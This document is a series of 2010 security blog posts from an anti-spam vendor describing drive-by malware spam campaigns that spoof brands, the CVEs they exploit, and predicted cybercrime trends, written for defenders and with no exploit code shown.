C.S. is a regular contributor to the Red Condor Security blog and a master at writing anti-spam rules—handwritten scripts that target new, slippery spam campaigns [...]
Read more >July 26, 2010
…And the Plug-and-Play Malware Exploits Continue...
Well, these scammers are busy… Less than 24 hours after issuing a warning of new variations and tactics being used in the o...
Well, these scammers are busy…
Less than 24 hours after issuing a warning of new variations and tactics being used in the one-click, plug-and-play malware campaign that we have been monitoring the past several months, we blocked a number of new messages that spoofed Amazon, ImageShack and Gawab. All of the messages used the plug-n-play malware distribution architecture.
Interestingly, Friday’s messages reverted back to using the older exploit set that has been in use for the past couple months.
There is a new twist in these messages however… The scammers are using this opportunity to perform the drive-by download as usual, but instead of using the redirection page to drop you on a Canadian Pharmacy site, the redirection instructs the browser to download an .exe (adobe_flash_install.exe), which as of this morning, was not detected by any AV engines.
Below is the VT analysis of this malware:
Also, just in case the browser refresh directive doesn’t work, the redirect page when loaded just looks like a blank page with a single image loaded:
http://www.thecoca-colacompany.com/images/noflash_singlevideo.gif
(The above link is safe to view. The spammers are using a legitimate image hosted on Coca-Cola’s website.)
Clicking on the image on the redirect page will also download the malicious .exe.
All this is in addition to the usual litany of exploits typically employed by these campaigns; they are using a couple different versions this time. None of these variations are detected by more than a handful of AV engines. The malicious payloads include a couple of signature-distinct executables, which most likely are two instances of the same Trojan that has simply been mutated:
Additionally there is the usual, freshly mutated PDF exploit:
And of course there are the other exploits that usually accompany these campaigns, but they do not appear to have changed much.
Posted by: C.S.
In more than one blog post during the last several months, we have discussed a sophisticated plug-and-play malware campaign that infects users’ computers with a single click. During the last several months, the spammers have spoofed several major brands, including Facebook, Ebay, Amazon, YouTube, GoDaddy.com, WordPress and Wikipedia. Today, we blocked another variant, which at the time we blocked it, the drive-by downloader component had only been detected by a single anti-virus engine (as is typical for these campaigns).
One of the emails in the campaign had this subject line: “Unauthorized ACH Transaction.” The email warns recipients that an unauthorized ACH transaction was recently initiated from their bank account, but it was rejected by the “Electronic Payments Association.” The user is then invited to click on an embedded link to review the transaction report. The single-click could infect users’computers with a Trojan virus.
We also noticed other campaigns today that were using this technique, but spoofing Xerox WorkCentre messages which are used to send scanned documents as attachments over email.
The one-click malware spammers finally switched out one of the older exploits they had been using (CVE-2006-0003) for months. This exploit was replaced with another more recent one– the Windows Help Center vulnerability (CVE 2010-1885). This exploit was reported in early June, and Microsoft recently issued a patch. For the first time that I am aware of, this particular vulnerability is being exploited in combination with yet another vulnerability CVE-2010-2265 that allows cross-site scripting (XSS), thereby classifying this spam attack as a blended threat and ultimately achieving remote code execution.
It appears that the code used in this attack was copied verbatim from public exploit repositories that collect such threats for research purposes. It’s worth noting that the previous exploits from this campaign also used proof-of-concept code virtually unchanged from public sources.
Game-changing, plug-and-play attacks
Here is an example of the newly introduced code being used in this attack:
I’ve been writing about this new trend in one-click malware <http://www.redcondor.com/blog/?p=258> for months now. Recently, I had an epiphany.
Essentially the spammers have constructed an efficient malware distribution framework where they can use their “normal” spam campaigns in double-duty mode. This allows an efficient search of Internet-connected hosts to find and exploit vulnerable machines.
This activity is transparent to the normal function of their spam campaigns. In other words, they can spamvertize any website as usual, but now have the added bonus of piggybacking these campaigns with modular attacks that can be updated by criminals at any time and with little effort.
For this reason I have started referring to this technique as a “plug-n-play” architecture because they can simply chain on exploits as they become available without needing to modify their spam campaigns in any way. They can use this technique in any spam campaign that uses a URL based call-to-action. This is a game changer.
Spammers ironing out the kinks
Despite their sophistication, it appears that the spammers are still trying to iron out some kinks. One of the samples that we blocked earlier in the day had a broken call-to-action URL, and in another sample that I analyzed, the redirect page was broken too. The redirect requests the browser to navigate to the malware distribution site instead of the usual Canadian Pharmacy (or similar) drop-site. This may indicate that there is some type of kit that is behind this recent wave and some spammers haven’t quite figured out how to use it effectively.
These campaigns occurred almost simultaneously with several other variants, all using the same “ACH” and Xerox templates. But instead of using the redirection URL that is the earmark of this plug-n-play exploit framework, they instead used a direct link to a windows executable (.exe). Additionally, another variant was observed that embedded the malicious executable within an archive attached directly to the spam. These more direct and traditional methods of infection occurring along side the plug-n-play variant suggests that the scammers are testing which delivery method is more successful.
A final note: The executables being used in the campaign appear to be Zbot/Bredo variants–“banking” Trojans that Red Condor has reported on in past security alerts.
Posted by: C.S.
In lieu of the usual year-end Top __ List (fill in the blank), I’ve decided to post my Top 5 list of trends to watch, mid-year. The underground economy built on the greed and ambition of cybercriminals is maturing, opening up new opportunities to exploit users, governments, and corporations. It behooves all of us to learn what we can, now.
1. Criminals will increasingly leverage opportunities to commit corporate and/or political espionage and intellectual property theft.
With hundreds of millions of infected machines connected to the Internet, there is much potential for dedicated adversaries to seek access to zombies in specific organizations as preliminary steps in sophisticated targeted attacks. Several such events have been reported recently. As bot-herders awaken to the vast potential that their compromised machines represent — both in terms of local information as well as footholds into private networks — these information warfare attacks will ramp up considerably.
Right now, I presume the major impediment to these activities is simply in connecting the supply to the demand and vice-versa. As the information age underground economy continues to expand and mature, these activities have the potential to spread like wildfire.
2. More refined systems for the monetization of private information.
Count on a rise in the number of ransom demands by criminals in exchange for stolen information. The case of the encrypted hard drive is only the beginning.
It won’t be long before criminals figure out what they can really do with all that information–perhaps starting as a fallback if they’re unable to sell a particular resource.
In a similar vein, it is likely that blackmailing could become another significant emerging threat. However the target of these blackmailing attempts won’t be limited to execs and political figures, but will include all Internet users. I see it as a simple attack that could be easily mounted in a manner similar to the way “lost wallet” scams are sent to the address book of recently compromised web-mail accounts.
3. An explosion of plug-and-play malware distribution.
The development of phishing and malware kits led to a threat explosion due to a lower bar to entry and ease of reproduction. A similar trend seems to be occurring, with modular plug-and-play malware distribution methods that can be easily and transparently inserted into any spam campaign. This effectively turns any spam campaign into an efficient search method for finding and exploiting vulnerable hosts.
In the past, malware-based spam campaigns were of a single intent — to install malware on as many systems as possible–and perpetrated by bot-herders to increase the size of their flock. Individually crafted, these campaigns take advantage of some specific new exploit or to leverage popular news items and holidays.
Now it appears that a new strategy is forming where any spam campaign can simply “plug in” a malware component. The stealthy drive-by techniques that enable it are general purpose, so the malware distribution infrastructure can be re-used in future campaigns without difficulty. The exploits can even be updated in real-time as new vulnerabilities are found. I expect this technique to become a permanent feature of many future spam campaigns.
4. Increased use of novel attack vectors.
Only recently has the average netizen become aware of the many potential risks associated with the use of social networking sites. These services represent new ways for attackers to interface with their victims as well as perform reconnaissance for targeted extended attacks and exploit the implicit trust you have in your “friends” by impersonating them. And as technologically advanced tools like smart-phones, smart-cars and other “smart” things pervade our lives I expect that we will see completely novel exploits that will catch many people off guard.
We might begin to see increased attacks on personal area networks that seek to exploit Bluetooth communications, or fingerprinting individuals based on signatures that can be formed from the signals emitted by the myriad devices we are constantly carrying; or social engineering attacks used to gain access to vehicles with remotely accessible door locks.
The ways in which technology intersects our everyday lives will fall under increased scrutiny by criminals seeking to take advantage of subtle, overlooked vulnerabilities that can stack up with disastrous consequences. Even now, with the mainstream adoption of online banking, many people still don’t understand the importance of securing their wireless home networks.
5. A significant increase in spam and scams perpetrated via VoIP and other communication protocols.
The fundamental properties of SMTP that led to the massive proliferation of spam are: cheap electronic message transmission and openness in communication endpoints (anyone can message anyone else).
VoIP systems also have these properties and as VoIP continues to proliferate, become more integrated, cheaper to access and utilize, along with several other enabling components (such as cheap bandwidth, text-to-speech, speech-to-text and translation systems), I expect that information age criminals will branch out more fully into this medium. Already there have been several reports of “vishing” attacks carried out by scammers, and I would expect these attacks to increase in volume and sophistication.
I expect new and creative attacks carried out through other systems sharing these properties but with better call-to-action potential like instant messaging, micro-blogging, etc. Obviously these have and are all being abused by spammers and their ilk. But they have not yet been exploited to anywhere near the degree seen in email. As various enabling factors continue to emerge I expect the same perverse inversion in the ratio of legitimate to illegitimate traffic to occur in VoIP and other protocols over the long-term.
Posted by: C.S.
Cyber-attacks are a big topic in the media and blogosphere these days. A wake-up call, finally. Rogue states and unfriendly regimes launch attacks against the U.S., South Korea and other nations. Corporate spies and independent hackers infiltrate networks to obtain trade secrets and financial and account data that will either command a price on the black market or provide criminals with the means to perpetuate more criminal activities.
In a recent report by the Ponemon Institute, of the 83 percent of executives who reported their companies had been victims of an advanced threat, nearly half reported a theft of confidential information or intellectual property. That’s a hefty number of occurrences. And yet, for all the money corporations spend on physical security—cameras in the lobby, ID badges, and biometrics and body scanners—digital “property” remains vulnerable to attack.
Secure access to the corporate network should expand beyond the username and password paradigm into new paradigms for protection such as biometrics and digital keys. Users need to be better educated about the dangers of phishing emails, especially in this era of sophisticated attacks that spoof trusted brands such as Adobe, eBay and AT&T.
Aside from an effective anti-spam filter, the strongest defense against phishing attacks is safe user behavior, stringent policies and training procedures, and technologies that support email security solutions. To this end, Red Condor recommends the following:
Financial institutions should take the lead in security–given the level of sensitivity of the data they protect and issues with customer liability when corporate accounts are compromised. The Experi-Metal (EMI) and Comerica Bank suit provides an example of the real costs of phishing. The case involves an EMI employee unwittingly responding to a phishing email that ultimately allowed scammers to transfer half a million dollars from EMI’s corporate bank account to accounts around the world. EMI is now suing Comerica for the losses.
Cases like this one, with more sure to follow, indicate that corporations and their executives have yet to grasp the size and scope of the phishing problem. Only new security products that complement email security solutions and continually update user policies and education programs will suffice. For these changes to occur, executives need to heed the wake-up call.
Posted by: Team R.C.
